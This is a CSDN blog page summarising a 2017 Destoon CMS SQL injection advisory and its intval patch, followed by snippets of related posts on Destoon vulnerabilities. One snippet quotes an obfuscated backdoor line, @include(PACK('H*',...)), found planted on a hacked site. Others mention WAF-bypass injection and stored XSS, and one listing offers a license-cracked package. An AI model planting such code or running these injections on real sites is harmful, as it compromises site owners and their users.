destoon注入漏洞

最新推荐文章于 2021-08-19 10:24:44 发布
最新推荐文章于 2021-08-19 10:24:44 发布
阅读量2.8k 收藏
点赞数
分类专栏: destoon
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34862577/article/details/79401364
版权
本文介绍了Destoon CMS的一个高危注入漏洞,该漏洞发生在PHP 5.2环境下,允许攻击者通过未正确过滤的变量进行注入。披露时间为2017年3月22日。解决方案涉及修改`mall.class.php`文件中的两行代码,通过添加`intval`函数强化输入过滤。修复此漏洞可能与云盾的自研修复模式冲突,导致误报,用户可以选择忽略云盾的提示。
摘要由CSDN通过智能技术生成

漏洞名称:destoon注入漏洞
漏洞等级: 高危
披露时间:2017-03-22 08:59:13
漏洞类型:Web-CMS漏洞
漏洞描述:
在php5.2下可以绕过waf,利用没有正确过滤的变量进行注入。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示】

最低0.47元/天 解锁文章
TMP_Rico
关注
专栏目录
DESTOON-9.0-BIZ-完整包20230320.zip
04-03
测试内容可能涵盖功能测试(如商品浏览、购买流程、会员注册登录)、性能测试(如并发访问能力、页面加载速度)、安全测试(如防止SQL注入、XSS攻击)以及兼容性测试(确保在不同浏览器和设备上正常运行)。...
guestbook.php注入,Destoon 6.0 guestbook.php 通用SQL注入漏洞
weixin_32827751的博客
03-09 495
来源: https://www.leavesongs.com/PENETRATION/destoon-v6-0-sql-injection.html作者: phithon刚看到今天发布了Destoon 6.0 2017-01-09 更新,用我在【代码审计】小密圈里说过的方法,瞬间找到修复的一处SQL注入漏洞。用中午的20分钟,小小地分析一下。我们先看看diff(左新右老):mobile/guest...
Destoon(B2B网站系统) 6.0 GBK 20171011.zip
05-24
Destoon(B2B网站系统)使用当前流行的PHP语言开发,以MySQL为数据库,采用B/S架构,MVC模式开发。融入了模型化、模板、缓存、AJAX、SEO等前沿技术。与同类产品相比,系统功能更加强大、使用更加简单、运行更加稳定、安全性更强,效率更高,用户体验更好。系统开源发布,便于二次开发、功能整合、个性修改。 Destoon 6.0 GBK 20171011 更新日志: [修复]手机版留言存在SQL注入漏洞;[修复]Kindeditor编辑器插入视频无法在手机版播放;[修复]分类设置了SEO信息没有优先显示;[修复]快钱支付接口无法支付成功;[修复]易宝支付错误信息未正确保存;[更新]常用支付接口申请地址;[更新]最新QQ视频匹配播放规则;[优化]Memcache服务无法连接时自动切换到文件缓存。
漏洞学习——XSS】Destoon B2B网站管理系统存储xss
Fly_鹏程万里
02-22 1098
漏洞简介 Destoon B2B网站管理系统存储xss,可打后台cookie 我们在修改资料的地方插入xss 查看源代码- - 发现没有做任何的过滤 <td class="tr"> <input type="text" size="40" name="post[address]" id="daddress" value="\"&
阿里云提示漏洞destoon变量覆盖导致延时注入
weixin_34060299的博客
08-18 284
出现漏洞 .../module/mall/my.inc.php .../backup/module/mall/my.inc.php 修复方法: my.inc.php里面所有的extract函数加上, EXTR_SKIP参数就可以 比如extract($item);修改成extract($item,EXTR_SKIP); ...
array_map php ord,Destoon最新全版本通杀SQL注入漏洞
weixin_33734087的博客
03-24 440
Author:Kavia/common.inc.php 64行:[php]if($_POST) $_POST = strip_sql($_POST);//strip_sql()过滤if($_GET) $_GET = strip_sql($_GET);if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);.........if($_POST) extract($_P...
Destoon被植木马 @include(PACK('H*','2F746D702F2E4943452D756E69782F30'));
xingnang2008的专栏
06-25 1346
暂无法确定,植入路径! 网站收录页面被指向波菜,但用浏览器,打开时提示403。应该代码中加入了判断浏览器header的代码。 在站内搜索到两个php文件,有代码写入 @include(PACK('H*','2F746D702F2E4943452D756E69782F30')); 用16进制转字符串后 2F746D702F2E4943452D756E69782F30 => /tmp/....
Destoon7.0蓝色宽屏垂直门户网站源码
11-17
4. **安全性**:Destoon7.0对安全方面进行了优化,包括SQL注入防护、XSS攻击防御等,保障网站的数据安全。 5. **SEO优化**:系统内置了强大的SEO设置功能,支持关键词设置、网页元标签编辑,有助于提升网站在搜索...
destoon5.0模板程序GBK
12-14
7. 安全防护:如防止SQL注入、XSS攻击,定期更新以修补安全漏洞。 8. 移动适配:5.0版本可能优化了响应式设计,使得网站在不同设备上都能良好显示。 总的来说,DESTOON 5.0模板程序GBK是一个全面的企业建站工具,...
DESTOON_8.0_UTF8_Crack_普通用户可安装版.zip
01-31
DESTOON8.0是一套基于PHP+MySQL的开源B2B电子商务行业门户网站解决方案,当前已发布会员、分站、商城、供应、求购、行情、公司、展会、文章、信息、品牌、团购、图库、专题、视频、下载、人才、知道等模型系统使用当前流行的PHP语言开发,以MySQL为数据库,采用B/S架构,MVC开发模式。融入了模型化、模板、缓存、Jquery、H5、AJAX、SEO等前沿技术。与同类产品相比,系统功能更加强大、使用更加简单、运行更加稳定、安全性更强,效率更高,用户体验更好。
DESTOON_8.0可直接安装.zip
11-11
该版本是DESTOON B2B Version 8.0 Release 20200731 UTF-8 ZH-CN 商业版,因原版本授权无法安装,所以特别了一下安装文件。
DESTOON UTF 源码
12-27
升级版通常会修复已知的安全漏洞,加强权限管理,防止SQL注入、XSS攻击等,确保用户数据安全。 4. **界面设计更新**:可能采用了更现代的UI设计,提高美观度,同时兼顾易用性,使得后台管理更为直观和便捷。 5. **...
如何绕过WAF进行sql注入
baidu_23564015的博客
05-26 1995
如何绕过WAF进行sql注入 原创 2016-05-26 思成 库安全 关于SQL注入 SQL注入是一种常见的入侵WEB应用的手法。SQL注入是利用应用系统的编程漏洞和SQL语言的语法特征,改变原始的SQL语句执行逻辑而产生的。 攻击者向Web应用发送精心构造的输入数据,这些输入中的一部分被解释成SQL指令,改变了原来的正常SQL执行逻辑,执行了攻击者发出的SQL命令,
解决DestoonB2B后台登陆出现:license.txt不可修改或删除(转)
weixin_34277853的博客
12-07 365
网站是使用DTB2B ,但是后台一直提示:license.txt不可修改或删除,请检查网上找的教程都是二进制上传license.txt,若MD5 值一样,那肯定能修复好,有没更好的办法呢?最模板提供如下cms教程:终极办法是找到admin/login.inc.php第7行代码 前加个 “//”如defined('IN_DESTOON') or exit('Access Den...
destoon php文件,Destoon 任意文件读取
weixin_32024145的博客
03-18 197
发布时间:2016-08-29公开时间:N/A漏洞类型:变量覆盖危害等级:高漏洞编号:xianzhi-2016-08-42442070测试版本:N/A漏洞详情include/remote.class.phpfunction construct($file, $savepath, $savename = '') {global $DT, $_userid;$this->file = strip...
DT6.0关于SQL注入漏洞修复问题
06-13 177
阿里云安全平台提示:Destoon SQL注入,关于: Destoon的/mobile/guestbook.php中$do->add($post);这行代码对参数$post未进行正确转义,导致黑客可进行SQL注入,获取网站后台密码等。解决办法:找到 $do->add($post);   改为: $do->add(daddslashes($p...
DESTOON从CSRF到GETSHELL
dfdhxb995397的博客
09-25 261
本文作者:薄荷糖微微凉 Destoon B2B网站管理系统是一套完善的B2B(电子商务)行业门户解决方案。系统基于PHP+MySQL开发,采用B/S架构,模板与程序分离,源码开放。模型化的开发思路,可扩展或删除任何功能;创新的缓存技术与数据库设计,可负载不低于百万级别数据容量及访问。系统被数万b2b网站所采用,同时,也有数量巨大的开发者利用该系统进行二次开发。 0x 01受影响版本...
destoon7.0-8.0解决pc端“您的页面可能存在图片不可全屏查看”百度移动落地页检测问题方法
积善之家
08-19 758
今天给大家带来关于destoon7.0-8.0解决pc端百度移动落地页检测出现:您的页面可能存在图片不可全屏查看 的问题。 要解决这个问题,首先就得新增图片全屏查看后不可缩放/左右滑动功能,,就得引入Fancybox这个js组件,干起来。 效果图: 引入Fancybox组件 在destoon模板中footer下加入: <script src="https://code.jquery.com/jquery-3.2.1.min.js">&...
Destoon二次开发完全指南
Destoon是一款功能强大的开源企业建站系统,专为企业或个人快速构建网站提供解决方案。这个开发攻略将为你揭示Destoon框架的一些关键元素和常用配置,帮助你在进行二次开发时更加得心应手。 首先,让我们来看看 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值